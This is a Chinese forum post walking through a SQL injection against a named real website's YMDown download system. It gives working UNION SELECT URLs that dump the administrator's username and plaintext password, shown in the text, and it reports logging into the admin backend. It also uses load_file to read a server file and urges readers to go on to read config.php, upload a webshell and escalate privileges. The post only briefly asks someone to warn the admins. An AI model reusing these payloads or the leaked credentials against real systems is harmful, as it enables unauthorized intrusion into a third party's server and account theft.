黑海管理员看看这个
我刚才在别的网站上看见的, 不知道你们改了没有!~
本来没想弄黑海的,上网搜索遇见的,我想应该没事谁知道... 写这篇文章也不知出于什么样的心情,黑色海岸线也算是国内一家有些知名度的网站了,记得以前就被黑过,怎么改过后还有这么低级的错误呢?我还没有告诉黑海的人,因为我本人也没有彻底的测试,万一被别的人给黑了,丢的都是大家的面子,这里只指出漏洞,感兴趣的朋友继续测试吧~~~
http://www.thysea.com/index.php黑海的主页,http://download.thysea.com/list.php黑海的下载页面,大家一看就应该知道了,夜猫的系统(想起黑白网了)。
测试页面:http://www.thysea.com/ymdown/show.php?id=2310,提交单引号后:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in G:/xue/黑海/ymdown/global.php on line 592,路径都出来了,字段都不用猜,都知道夜猫19个字段,提交:http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,返回
2 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 9/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
12
我们知道用户密码在ymdown_user中,2和9对应字符型和数字,提交:
http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201,username,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19%20from%20ymdown_user
回显:
jiangshan 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 0/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
12 用户名:jiangshan 密码:0??看来密码并不是数字,继续提交:
http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201,username,3,4,5,6,7,8,9,10,11,password,13,14,15,16,17,18,19%20from%20ymdown_user
回显:
jiangshan 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 9/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
jiangshanlovewufang
密码是:jiangshanlovewufang
然后直接登陆后台:http://www.thysea.com/ymdown/admin/index.php顺利进入!
再来测试一下暴文件吧,就读c:/boot.ini直接用ASC编码,在2的字符处显示
提交:http://www.thysea.com/ymdown/show.php?id=2310%20and%201=2%20union%20select%201,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
回显:
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)/WINDOWS [operating systems] 演示
更新日期 1970.01.01 程序类别 不详¦不详
文件大小 4 授权方式 5
应用平台 6 推荐程度
程序主页 Home Page 下载/浏览 9/8
下载地址 上海电信 无锡电信 河南网通 暂停下载 暂停下载
简介:
12
顺利读出c:/boot.ini内容:[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)/WINDOWS [operating systems]
到此我也就没有再继续了,大家可以继续读config.php,上传WEBSHELL,提升权限。
最后请哪位朋友通知黑海管理员,消除漏洞~~~~ |